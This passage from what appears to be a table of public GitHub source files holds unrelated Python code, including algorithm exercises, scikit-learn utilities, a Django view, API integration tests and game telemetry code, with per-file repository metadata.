self.assertRaises(RelaxNoPipeError, pipes.check_pipe)
self.assertRaises(RelaxNoPipeError, pipes.check_pipe, 'orig')
self.assertRaises(RelaxNoPipeError, pipes.check_pipe, 'empty')
| [
"bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5"
] | bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5 |
3536260316053a84bfe9507e9c17029afa97708e | 3c9004d310ef124d6eb3872d7e6b02799a4dfbfb | /面向对象/多重继承.py | 33e0fe0390bccf03408e5f7415b2fa8bdc15166c | [] | no_license | iguess1220/python | c2eae6011a4806e4a7f68ef9351dbffc2d9635f3 | 3be7fd4e130247715bc89525b3ab66a755863480 | refs/heads/master | 2020-04-08T22:33:01.218992 | 2018-12-18T08:09:23 | 2018-12-18T08:09:23 | 112,563,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | class Animal:
pass
class Mammal(Animal):
def body(self):
print("eat milk")
class Bird(Animal):
def body(self):
print("有翅膀")
class Runable(Animal):
def run(self):
print("running")
class Flyable(Animal):
def fly(self):
print("fly")
class Bat(Mammal,Flyable):
pass
b = Bat()
b.fly()
class tuoniao(Bird,Runable,Flyable):
pass
c = tuoniao()
c.run()
c.body()
| [
"17710890916@163.com"
] | 17710890916@163.com |
b9c1b57faec38343cc0531c69ae241bf31fc54fd | bc8a0e87417add0325c9124ee847efaf88d2daa1 | /PycharmProjects/week5/coursera_forms/formdummy/views.py | 1409ed3df327284e005f02b1e0ab417cf904ce4c | [] | no_license | Ivanlasich/python | f0034426ea91d956d4d47a0a41e099785a6ddf1a | d8ed501537581f01d07733bd81911d0f523d7bfc | refs/heads/master | 2022-12-12T21:06:46.473608 | 2019-12-08T19:03:41 | 2019-12-08T19:03:41 | 226,704,894 | 0 | 0 | null | 2022-12-08T02:40:00 | 2019-12-08T17:28:07 | Python | UTF-8 | Python | false | false | 242 | py | from django.shortcuts import render
from django.views import View
import requests
class FormDummyView(View):
def get(self, request):
r = requests.get('https://api.github.com/events')
return render(request,'form.html',{})
| [
"ivanlazichny@gmail.com"
] | ivanlazichny@gmail.com |
3bc8e2ac6257c4f60d8e100e9230c5b365aa231f | c83fe2005a44b436a8be1e0787834a8a93b2024b | /scripts/dynamic_programming/longest_common_substring.py | 6c200f0878b158a8bb9db30e056545648c26fb10 | [] | no_license | wulfebw/algorithms | 9eb0bacd8a7851d28beecb608a895925e26f543b | cbae6aba464a021ada842adb4eaed9dbd16dc0f2 | refs/heads/master | 2021-01-19T02:28:12.666777 | 2019-05-02T02:52:08 | 2019-05-02T02:52:08 | 49,041,959 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | '''
I think the difference between finding the lcsubstring and lcsubseq is that in the substring case you erase your progress, whereas with the subsequence you do not
'''
import numpy as np
def lcs(a,b):
n, m = len(a), len(b)
v = np.zeros((n+1, m+1))
for i in range(n):
for j in range(m):
if a[i] == b[j]:
v[i+1,j+1] = v[i,j] + 1
return int(v.max())
if __name__ == '__main__':
inputs = [
('GeeksforGeeks', 'GeeksQuiz'),
('abcdxyz', 'xyzabcd'),
('zxabcdezy', 'yzabcdezx'),
('aabbbccccddd', 'dddddbbbbbbaaaaacccc')
]
expect = [
5,
4,
6,
4
]
for (i,e) in zip(inputs, expect):
print(e)
print(lcs(*i))
print()
| [
"wulfebw@stanford.edu"
] | wulfebw@stanford.edu |
5fecb3d42317d7666bb4cf7e590626bd078063ef | d7998eacdd2ecd9623b520ec1c36524a2c3ab827 | /conwhat/__main__.py | 86cee1f77db13de34af7a5a1156f2579c0a8759e | [
"BSD-3-Clause"
] | permissive | raamana/ConWhAt | d50674e3d790704d8105eb69dfa96e8164c0c402 | 098ae8088f6d320ed414355be3d31a65b8bf43de | refs/heads/master | 2021-08-20T00:35:54.446433 | 2017-11-27T20:17:13 | 2017-11-27T20:17:13 | 112,232,400 | 0 | 0 | null | 2017-11-27T18:26:35 | 2017-11-27T18:26:34 | null | UTF-8 | Python | false | false | 488 | py |
def main():
"Entry point."
raise NotImplementedError('The command line interface for ConWhAt is not currently supported. '
'Please use it via API in a script or jupyter notebook. \n'
'Example usages : \n'
'from conwhat import StreamConnAtlas \n'
'from conwhat import VolConnAtlas \n'
'')
if __name__ == '__main__':
main() | [
"raamana@gmail.com"
] | raamana@gmail.com |
f00f2c84d5ce3a1e7902935d2bd5bc439c1b790b | 59212f32b5b3a274fde0875101b37aafe72891f1 | /crawller/selenium_base/classifier.py | 4da4ec8aaf59ec25d2fcb3bff2b7ea2920d5af49 | [] | no_license | afcarl/rehabilitation | b2dd1626deaa606469d7150982f130a2272dd3b0 | 67c6719d805201e0c9ee97fe9130398a9b93881a | refs/heads/master | 2020-03-22T09:59:09.623992 | 2017-02-03T01:06:05 | 2017-02-03T01:06:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,126 | py | from sklearn.feature_extraction.text import CountVectorizer
import json
from sklearn import svm
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
import random
from nltk.tokenize import sent_tokenize, word_tokenize
from functools import reduce
import numpy as np
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import chi2
from sklearn.feature_selection import SelectKBest
from sklearn import tree
from sklearn import linear_model
def get_dataset_stat_health():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("health.txt", "r")
list = json.load(handler)
grades = []
for pairs in list:
for grade,text in pairs.items():
if grade == "MAX":
grades.append(99999)
else:
grades.append(int(grade[0:-1]))
grades.sort()
idx = 0
for grade in grades:
if grade == 99999:
gradex = "MAX"
else:
gradex = "".join([str(grade), "L"])
text = "".join([pairs[gradex], " "])
sents = sent_tokenize(text)
sent_avg_len = 0
sent_cnt = 1
word_avg_len = 0
word_cnt = 1
for sent in sents:
for word in word_tokenize(sent):
word_avg_len += len(word)
word_cnt += 1
sent_avg_len += len(word_tokenize(sent))
sent_cnt += 1
sent_avg_len /= sent_cnt
word_avg_len /= word_cnt
feature = []
feature.append(sent_avg_len)
feature.append(word_avg_len)
dataset["data"].append(feature)
dataset["target"].append(idx)
idx += 1
grades.clear()
return dataset
def get_dataset_text_health():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("health.txt", "r")
list = json.load(handler)
grades = []
for pairs in list:
for grade,text in pairs.items():
if grade == "MAX":
grades.append(99999)
else:
grades.append(int(grade[0:-1]))
grades.sort()
idx = 0
for grade in grades:
if grade == 99999:
gradex = "MAX"
else:
gradex = "".join([str(grade), "L"])
text = "".join([pairs[gradex], " "])
loop_idx = idx
#while loop_idx >= 0:
dataset["data"].append(text)
dataset["target"].append(idx)
# loop_idx -= 1
idx += 1
grades.clear()
return dataset
def get_sample_dataset():
dataset = {}
dataset["data"] = []
dataset["target"] = []
dataset["data"] = ["a aa", "aa a", "a aaa", "a aaa","a aa", "aa a", "a aaa", "a aaa","a aa", "aa a", "a aaa", "a aaa","c cc","cc ","c ","cc ","c ","c "]
dataset["target"] = [1,1,1,1,1,1,1,1,1,1,1,1,3,3,3,3,3,3]
return dataset
def get_dataset_text_all():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("news.txt", "r")
list = json.load(handler)
for pairs in list:
for grade, text in pairs.items():
dataset["data"].append(text)
dataset["target"].append(grade)
return dataset
def get_dataset_stat_all():
dataset = {}
dataset["data"] = []
dataset["target"] = []
handler = open("news.txt", "r")
list = json.load(handler)
for pairs in list:
for grade, text in pairs.items():
dataset["target"].append(grade)
text = "".join([text, " "])
sents = sent_tokenize(text)
sent_avg_len = 0
sent_cnt = 1
word_avg_len = 0
word_cnt = 1
for sent in sents:
for word in word_tokenize(sent):
word_avg_len += len(word)
word_cnt += 1
sent_avg_len += len(word_tokenize(sent))
sent_cnt += 1
sent_avg_len /= sent_cnt
word_avg_len /= word_cnt
feature = []
feature.append(sent_avg_len)
feature.append(word_avg_len)
dataset["data"].append(feature)
return dataset
dataset1 = get_dataset_text_all()
dataset2 = get_dataset_stat_all()
print("finish get dataset")
ngrams = [2,3,4,5,6,7]
Cs = [10]
features = [100000, 150000,200000,240000]
# samp_order = random.sample(range(len(y)),len(y))
# X = [X[ind] for ind in samp_order]
# y = [y[ind] for ind in samp_order]
if False:
import pydotplus
print("for interpretation")
# word-level
count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
ngram_range=(1, 20))
X1 = count_vect.fit_transform(dataset1["data"])
y1 = dataset1["target"]
# feature-level
X2 = dataset2["data"]
y2 = dataset2["target"]
y = y1
X1 = X1.todense()
X = np.append(X1, np.matrix(X2), axis=1)
#populate col names
cols = ["UNK"] * X.shape[1]
for word, idx in count_vect.vocabulary_.items():
cols[idx] = word
cols[len(cols) - 1] = "Word Average"
cols[len(cols) - 2] = "Sentence Average"
classes = ["grade 2-3", "grade 4-6", "grade 7-8", "grade 9-10", "grade 11-12"]
clf = tree.DecisionTreeClassifier(criterion = "entropy")
clf.fit(X, y)
dot_data = tree.export_graphviz(clf, out_file=None, feature_names=cols, class_names=classes, filled=True, rounded=True, special_characters=True)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_pdf("tree2.pdf")
if True:
for feature in features:
for ngram in ngrams:
# word-level
count_vect = CountVectorizer(min_df=0, max_df=9999, binary=True, lowercase=True, stop_words=None,
ngram_range=(1, ngram))
X1 = count_vect.fit_transform(dataset1["data"])
y1 = dataset1["target"]
# print("finish", "transform")
# feature-level
X2 = dataset2["data"]
y2 = dataset2["target"]
y = y1
if feature < X1.shape[1]:
X1 = SelectKBest(chi2, k=feature).fit_transform(X1, y)
X1 = X1.todense()
# print("finish", "Kbest")
X = np.concatenate((X1, np.matrix(X2)), axis=1)
# print("finish", "append")
#for c in Cs:
key = " ".join(["feature", str(feature), "c", str(10), "ngram", str(ngram)])
try:
clf = tree.DecisionTreeClassifier()
# clf = LogisticRegression(multi_class='ovr', C=10)
# clf = svm.SVC(C=c, kernel='linear')
scores = cross_val_score(clf, X, y, cv=10, n_jobs=1, verbose=0)
print(key, reduce(lambda x, y: x + y, scores) / len(scores))
except Exception as exp:
print("error: ", key, "\t", exp)
| [
"zhaosanqiang916@gmail.com"
] | zhaosanqiang916@gmail.com |
b9b83013d4f1fab6c0ae403a06f74021bb5f9f05 | dec494542217437afa7f38e8703328b25b183cb8 | /999.py | 207d2953c1b147a171c8398e49277b1fa5063386 | [] | no_license | Transi-ent/LeetcodeSolver | ee44c9c4d5bce9f11c079c5b27b4b967790cb5cd | a89e19753666657a6f15c1be589b9b2dbd4b6c84 | refs/heads/master | 2021-04-16T20:37:34.710175 | 2021-02-24T03:51:43 | 2021-02-24T03:51:43 | 249,383,432 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | class Solution:
"""
先进行遍历,求出白车所在的位置(Row,Col),
再次进行遍历,查询所在的行和列可以捕获的卒
"""
def numRookCaptures(self, board: list) -> int:
r, c = None, None
flag = False
for i in range(8):
for j in range(8):
if board[i][j]=="R":
r, c = i, j
flag = True
break
if flag:
break
up, down, left, right = 0,0,0,0
hasBishop = False
for i in range(8):
for j in range(8):
if j==c and i<r:
if board[i][j]=="B":
up = 0
elif board[i][j]=='p':
up = 1
elif i==r:
if j<c:
if board[i][j]=='p':
left = 1
elif board[i][j]=="B":
left = 0
elif j>c:
if board[i][j]=="B":
break
elif board[i][j]=='p':
right = 1
elif i>r and j==c:
if board[i][j]=='B':
hasBishop = True
break
elif board[i][j]=='p':
down = 1
if hasBishop:
break
return up+down+left+right
| [
"1305113016@qq.com"
] | 1305113016@qq.com |
8c9cae3aba8d5b6fe82416613e41926a36508ce1 | 38bed8ec0229b2d42ebdb33e09930ba8ee6ba5b7 | /torchvision/prototype/models/depth/__init__.py | 0ff02953c242c42c461c32acfa468735252cf401 | [
"BSD-3-Clause",
"CC-BY-NC-4.0"
] | permissive | pytorch/vision | 10443ac1eddf7a32ecb288fe8f58e28cab2a60a1 | 1f94320d8db8d102214a7dc02c22fa65ee9ac58a | refs/heads/main | 2023-09-06T03:48:02.303020 | 2023-09-04T18:25:36 | 2023-09-04T18:25:36 | 73,328,905 | 15,620 | 8,564 | BSD-3-Clause | 2023-09-14T17:52:49 | 2016-11-09T23:11:43 | Python | UTF-8 | Python | false | false | 21 | py | from . import stereo
| [
"noreply@github.com"
] | pytorch.noreply@github.com |
cfe8be1936ffb48572be726f0bcc6d06589a4f7f | 070b693744e7e73634c19b1ee5bc9e06f9fb852a | /python/problem-bit-manipulation/reverse_bits.py | db3e7500f8dee52f9f70c219edb95dbf38ef56fb | [] | no_license | rheehot/practice | a7a4ce177e8cb129192a60ba596745eec9a7d19e | aa0355d3879e61cf43a4333a6446f3d377ed5580 | refs/heads/master | 2021-04-15T22:04:34.484285 | 2020-03-20T17:20:00 | 2020-03-20T17:20:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | # https://leetcode.com/problems/reverse-bits
# 33.75%
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
bits, bit = [], 0x1
for i in range(32):
print('bit {}, n & bit {}'.format(bit, n & bit))
if 0 == n & bit:
bits.append('0')
else:
bits.append('1')
bit <<= 1
print(bits)
return int(''.join(bits), 2)
s = Solution()
data = [(43261596, 964176192)]
for n, expected in data:
real = s.reverseBits(n)
print('{}, expected {}, real {}, result {}'.format(n, expected, real, expected == real))
| [
"morpheus.0@kakaocorp.com"
] | morpheus.0@kakaocorp.com |
a841c652172a7aa0a01324d759390454a36c21f2 | c7044393f89ffee67f30a277019372506d3b0af4 | /tests/integration/test_billpayment.py | c16f8a530034dc79212393f29a91faa2cace5663 | [
"MIT"
] | permissive | stephanelsmith/python-quickbooks | 66845f54aef86dc43a081dd49345a9c090642433 | 20fd4b6e92fe5a5e8dac43daefb0568f0465b62c | refs/heads/master | 2020-06-17T19:22:15.175039 | 2019-07-09T14:34:44 | 2019-07-09T14:34:44 | 196,022,916 | 0 | 0 | MIT | 2019-07-09T14:16:53 | 2019-07-09T14:16:52 | null | UTF-8 | Python | false | false | 2,408 | py | import os
import unittest
from datetime import datetime
from quickbooks.auth import Oauth1SessionManager
from quickbooks.client import QuickBooks
from quickbooks.objects.account import Account
from quickbooks.objects.bill import Bill
from quickbooks.objects.billpayment import BillPayment, BillPaymentLine, CheckPayment
from quickbooks.objects.vendor import Vendor
class BillPaymentTest(unittest.TestCase):
def setUp(self):
self.session_manager = Oauth1SessionManager(
sandbox=True,
consumer_key=os.environ.get('CONSUMER_KEY'),
consumer_secret=os.environ.get('CONSUMER_SECRET'),
access_token=os.environ.get('ACCESS_TOKEN'),
access_token_secret=os.environ.get('ACCESS_TOKEN_SECRET'),
)
self.qb_client = QuickBooks(
session_manager=self.session_manager,
sandbox=True,
company_id=os.environ.get('COMPANY_ID')
)
self.account_number = datetime.now().strftime('%d%H%M')
self.name = "Test Account {0}".format(self.account_number)
def test_create(self):
bill_payment = BillPayment()
bill_payment.PayType = "Check"
bill_payment.TotalAmt = 200
bill_payment.PrivateNote = "Private Note"
vendor = Vendor.all(max_results=1, qb=self.qb_client)[0]
bill_payment.VendorRef = vendor.to_ref()
bill_payment.CheckPayment = CheckPayment()
account = Account.where("AccountSubType = 'Checking'", qb=self.qb_client)[0]
bill_payment.CheckPayment.BankAccountRef = account.to_ref()
ap_account = Account.where("AccountSubType = 'AccountsPayable'", qb=self.qb_client)[0]
bill_payment.APAccountRef = ap_account.to_ref()
bill = Bill.all(max_results=1, qb=self.qb_client)[0]
line = BillPaymentLine()
line.LinkedTxn.append(bill.to_linked_txn())
line.Amount = 200
bill_payment.Line.append(line)
bill_payment.save(qb=self.qb_client)
query_bill_payment = BillPayment.get(bill_payment.Id, qb=self.qb_client)
self.assertEquals(query_bill_payment.PayType, "Check")
self.assertEquals(query_bill_payment.TotalAmt, 200.0)
self.assertEquals(query_bill_payment.PrivateNote, "Private Note")
self.assertEquals(len(query_bill_payment.Line), 1)
self.assertEquals(query_bill_payment.Line[0].Amount, 200.0)
| [
"edward.emanuel@gmail.com"
] | edward.emanuel@gmail.com |
b74b3f64c971504ff7beaf4a8b24756ffbbd7933 | a38180435ac5786185c0aa48891c0aed0ab9d72b | /S4/S4 Library/simulation/sims/university/university_telemetry.py | 3d65d5f99c17da1c0b69dc34bea11a7d0f241659 | [
"CC-BY-4.0"
] | permissive | NeonOcean/Environment | e190b6b09dd5dbecba0a38c497c01f84c6f9dc7d | ca658cf66e8fd6866c22a4a0136d415705b36d26 | refs/heads/master | 2022-12-03T13:17:00.100440 | 2021-01-09T23:26:55 | 2021-01-09T23:26:55 | 178,096,522 | 1 | 1 | CC-BY-4.0 | 2022-11-22T20:24:59 | 2019-03-28T00:38:17 | Python | UTF-8 | Python | false | false | 3,176 | py | import build_buy
import services
import sims4.telemetry
import telemetry_helper
TELEMETRY_GROUP_UNIVERSITY = 'UNIV'
TELEMETRY_HOOK_UNIVERSITY_HOUSING = 'UNHO'
TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE = 'UNAC'
TELEMETRY_HOOK_UNIVERSITY_ENROLL = 'UNEN'
TELEMETRY_HOOK_UNIVERSITY_TERM = 'UNTE'
TELEMETRY_HOOK_UNIVERSITY_COURSE = 'UNCO'
TELEMETRY_HOOK_UNIVERSITY_TUITION = 'UNTU'
TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING = 'ioch'
TELEMETRY_FIELD_SIM_AGE = 'sage'
TELEMETRY_FIELD_UNIVERSITY_MAJOR = 'umaj'
TELEMETRY_FIELD_TERM_GPA = 'tgpa'
TELEMETRY_FIELD_COURSE_ID = 'cour'
TELEMETRY_FIELD_COURSE_GRADE = 'grad'
TELEMETRY_FIELD_TUITION_COST = 'tcst'
TELEMETRY_FIELD_IS_USING_LOAN = 'iuln'
university_telemetry_writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_UNIVERSITY)
logger = sims4.log.Logger('UniversityTelemetry', default_owner='mkartika')
class UniversityTelemetry:
@staticmethod
def send_university_housing_telemetry(zone_id):
if zone_id is None:
return
is_university_housing = False
if zone_id != 0:
venue_manager = services.get_instance_manager(sims4.resources.Types.VENUE)
venue = venue_manager.get(build_buy.get_current_venue(zone_id))
is_university_housing = venue.is_university_housing
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_HOUSING) as hook:
hook.write_bool(TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING, is_university_housing)
@staticmethod
def send_acceptance_telemetry(sim_age):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE) as hook:
hook.write_enum(TELEMETRY_FIELD_SIM_AGE, sim_age)
@staticmethod
def send_university_enroll_telemetry(sim_info, major):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ENROLL, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
@staticmethod
def send_university_term_telemetry(sim_info, major, gpa):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TERM, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
hook.write_float(TELEMETRY_FIELD_TERM_GPA, gpa)
@staticmethod
def send_university_course_telemetry(sim_info, major, course_data, grade):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_COURSE, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
hook.write_int(TELEMETRY_FIELD_COURSE_ID, course_data.guid64)
hook.write_int(TELEMETRY_FIELD_COURSE_GRADE, grade)
@staticmethod
def send_university_tuition_telemetry(sim_info, tuition_cost, is_using_loan):
with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TUITION, sim_info=sim_info) as hook:
hook.write_int(TELEMETRY_FIELD_TUITION_COST, tuition_cost)
hook.write_bool(TELEMETRY_FIELD_IS_USING_LOAN, is_using_loan)
| [
"40919586+NeonOcean@users.noreply.github.com"
] | 40919586+NeonOcean@users.noreply.github.com |
c92b9ff5f6511b9cfc629cace269b98af358d96a | 3f28b697f570ded0502de70c706200005ab62525 | /env/lib/python2.7/site-packages/sklearn/neighbors/kde.py | 8d940264f4374324ce9e5916eab9b797b0fd9d09 | [
"MIT"
] | permissive | Ram-Aditya/Healthcare-Data-Analytics | 5387e41ad8e56af474e10fa2d1c9d8a2847c5ead | d1a15d2cc067410f82a9ded25f7a782ef56b4729 | refs/heads/master | 2022-12-09T12:49:59.027010 | 2019-11-23T20:10:55 | 2019-11-23T20:10:55 | 223,639,339 | 0 | 1 | MIT | 2022-11-22T00:37:48 | 2019-11-23T19:06:20 | Jupyter Notebook | UTF-8 | Python | false | false | 7,925 | py | """
Kernel Density Estimation
-------------------------
"""
# Author: Jake Vanderplas <jakevdp@cs.washington.edu>
import numpy as np
from scipy.special import gammainc
from ..base import BaseEstimator
from ..utils import check_array, check_random_state
from ..utils.extmath import row_norms
from .ball_tree import BallTree, DTYPE
from .kd_tree import KDTree
VALID_KERNELS = ['gaussian', 'tophat', 'epanechnikov', 'exponential', 'linear',
'cosine']
TREE_DICT = {'ball_tree': BallTree, 'kd_tree': KDTree}
# TODO: implement a brute force version for testing purposes
# TODO: bandwidth estimation
# TODO: create a density estimation base class?
class KernelDensity(BaseEstimator):
"""Kernel Density Estimation
Parameters
----------
bandwidth : float
The bandwidth of the kernel.
algorithm : string
The tree algorithm to use. Valid options are
['kd_tree'|'ball_tree'|'auto']. Default is 'auto'.
kernel : string
The kernel to use. Valid kernels are
['gaussian'|'tophat'|'epanechnikov'|'exponential'|'linear'|'cosine']
Default is 'gaussian'.
metric : string
The distance metric to use. Note that not all metrics are
valid with all algorithms. Refer to the documentation of
:class:`BallTree` and :class:`KDTree` for a description of
available algorithms. Note that the normalization of the density
output is correct only for the Euclidean distance metric. Default
is 'euclidean'.
atol : float
The desired absolute tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 0.
rtol : float
The desired relative tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 1E-8.
breadth_first : boolean
If true (default), use a breadth-first approach to the problem.
Otherwise use a depth-first approach.
leaf_size : int
Specify the leaf size of the underlying tree. See :class:`BallTree`
or :class:`KDTree` for details. Default is 40.
metric_params : dict
Additional parameters to be passed to the tree for use with the
metric. For more information, see the documentation of
:class:`BallTree` or :class:`KDTree`.
"""
def __init__(self, bandwidth=1.0, algorithm='auto',
kernel='gaussian', metric="euclidean", atol=0, rtol=0,
breadth_first=True, leaf_size=40, metric_params=None):
self.algorithm = algorithm
self.bandwidth = bandwidth
self.kernel = kernel
self.metric = metric
self.atol = atol
self.rtol = rtol
self.breadth_first = breadth_first
self.leaf_size = leaf_size
self.metric_params = metric_params
# run the choose algorithm code so that exceptions will happen here
# we're using clone() in the GenerativeBayes classifier,
# so we can't do this kind of logic in __init__
self._choose_algorithm(self.algorithm, self.metric)
if bandwidth <= 0:
raise ValueError("bandwidth must be positive")
if kernel not in VALID_KERNELS:
raise ValueError("invalid kernel: '{0}'".format(kernel))
def _choose_algorithm(self, algorithm, metric):
# given the algorithm string + metric string, choose the optimal
# algorithm to compute the result.
if algorithm == 'auto':
# use KD Tree if possible
if metric in KDTree.valid_metrics:
return 'kd_tree'
elif metric in BallTree.valid_metrics:
return 'ball_tree'
else:
raise ValueError("invalid metric: '{0}'".format(metric))
elif algorithm in TREE_DICT:
if metric not in TREE_DICT[algorithm].valid_metrics:
raise ValueError("invalid metric for {0}: "
"'{1}'".format(TREE_DICT[algorithm],
metric))
return algorithm
else:
raise ValueError("invalid algorithm: '{0}'".format(algorithm))
def fit(self, X, y=None):
"""Fit the Kernel Density model on the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
"""
algorithm = self._choose_algorithm(self.algorithm, self.metric)
X = check_array(X, order='C', dtype=DTYPE)
kwargs = self.metric_params
if kwargs is None:
kwargs = {}
self.tree_ = TREE_DICT[algorithm](X, metric=self.metric,
leaf_size=self.leaf_size,
**kwargs)
return self
def score_samples(self, X):
"""Evaluate the density model on the data.
Parameters
----------
X : array_like, shape (n_samples, n_features)
An array of points to query. Last dimension should match dimension
of training data (n_features).
Returns
-------
density : ndarray, shape (n_samples,)
The array of log(density) evaluations.
"""
# The returned density is normalized to the number of points.
# For it to be a probability, we must scale it. For this reason
# we'll also scale atol.
X = check_array(X, order='C', dtype=DTYPE)
N = self.tree_.data.shape[0]
atol_N = self.atol * N
log_density = self.tree_.kernel_density(
X, h=self.bandwidth, kernel=self.kernel, atol=atol_N,
rtol=self.rtol, breadth_first=self.breadth_first, return_log=True)
log_density -= np.log(N)
return log_density
def score(self, X, y=None):
"""Compute the total log probability under the model.
Parameters
----------
X : array_like, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
logprob : float
Total log-likelihood of the data in X.
"""
return np.sum(self.score_samples(X))
def sample(self, n_samples=1, random_state=None):
"""Generate random samples from the model.
Currently, this is implemented only for gaussian and tophat kernels.
Parameters
----------
n_samples : int, optional
Number of samples to generate. Defaults to 1.
random_state : RandomState or an int seed (0 by default)
A random number generator instance.
Returns
-------
X : array_like, shape (n_samples, n_features)
List of samples.
"""
# TODO: implement sampling for other valid kernel shapes
if self.kernel not in ['gaussian', 'tophat']:
raise NotImplementedError()
data = np.asarray(self.tree_.data)
rng = check_random_state(random_state)
i = rng.randint(data.shape[0], size=n_samples)
if self.kernel == 'gaussian':
return np.atleast_2d(rng.normal(data[i], self.bandwidth))
elif self.kernel == 'tophat':
# we first draw points from a d-dimensional normal distribution,
# then use an incomplete gamma function to map them to a uniform
# d-dimensional tophat distribution.
dim = data.shape[1]
X = rng.normal(size=(n_samples, dim))
s_sq = row_norms(X, squared=True)
correction = (gammainc(0.5 * dim, 0.5 * s_sq) ** (1. / dim)
* self.bandwidth / np.sqrt(s_sq))
return data[i] + X * correction[:, np.newaxis]
| [
"ramaditya.danbrown@gmail.com"
] | ramaditya.danbrown@gmail.com |
3c66085bda3a774bb6434ae9fc4233056dbbd85b | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2751486_0/Python/alexamici/A.py | 1cade536bfb429e80d1ec2be059a5be3fb11af7c | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | """Usage:
pypy X.py < X-size.in > X-size.out
or sometimes
python X.py < X-size.in > X-size.out
"""
def setup(infile):
#C = {}
return locals()
def reader(testcase, infile, C=None, **ignore):
#N = int(infile.next())
#P = map(int, infile.next().split())
#I = map(int, infile.next().split())
T = infile.next().split()
#S = [infile.next().strip() for i in range(N)]
return locals()
def solver(testcase, N=None, P=None, I=None, T=None, S=None, C=None, **ignore):
#import collections as co
#import functools32 as ft
#import itertools as it
#import operator as op
#import math as ma
#import re
#import numpypy as np
#import scipy as sp
#import networkx as nx
name, n = T[0], int(T[1])
N = []
c = 0
for i, l in enumerate(name):
if l not in 'aeiou':
c += 1
if c >= n:
N.append(i)
else:
c = 0
res = 0
for i in range(len(name)):
for j in range(i+n-1, len(name)):
for k in range(i+n-1,j+1):
if k in N:
res += 1
break
return 'Case #%s: %s\n' % (testcase, res)
if __name__ == '__main__':
import sys
T = int(sys.stdin.next())
common = setup(sys.stdin)
for t in xrange(1, T+1):
sys.stdout.write(solver(**reader(t, **common)))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
386d31faf6a46dfb07690904507a892a1c2708d7 | 43e0cfda9c2ac5be1123f50723a79da1dd56195f | /python/paddle/fluid/tests/unittests/test_eager_run_program.py | a04c544e9025732bcea5e8f43a232c46e494c447 | [
"Apache-2.0"
] | permissive | jiangjiajun/Paddle | 837f5a36e868a3c21006f5f7bb824055edae671f | 9b35f03572867bbca056da93698f36035106c1f3 | refs/heads/develop | 2022-08-23T11:12:04.503753 | 2022-08-11T14:40:07 | 2022-08-11T14:40:07 | 426,936,577 | 0 | 0 | Apache-2.0 | 2022-02-17T03:43:19 | 2021-11-11T09:09:28 | Python | UTF-8 | Python | false | false | 4,235 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import numpy as np
from paddle import _C_ops
from paddle.fluid.framework import _test_eager_guard, Variable, _in_legacy_dygraph
from paddle.fluid import core
from paddle.fluid.layers.utils import _hash_with_id
import paddle.compat as cpt
import unittest
def _append_backward_desc(main_program, outs):
# make sure all status of is_test are False in train mode.
program = main_program.clone()
targets = []
for out in outs:
if isinstance(out, Variable):
targets.append(program.global_block().var(out.name))
if targets:
paddle.fluid.backward.gradients(targets=targets, inputs=[])
return program
# def _set_grad_type(params, train_program):
# # NOTE: if user set sparse gradient mode, the param's gradient
# # will be SelectedRows, not LoDTensor. But tracer will just
# # set param grad VarBase by forward VarBase(LoDTensor)
# # If we don't change grad_var type here, RunProgramOp need
# # transform SelectedRows to LoDTensor forcibly, it may not
# # be user wanted result.
# for param in params:
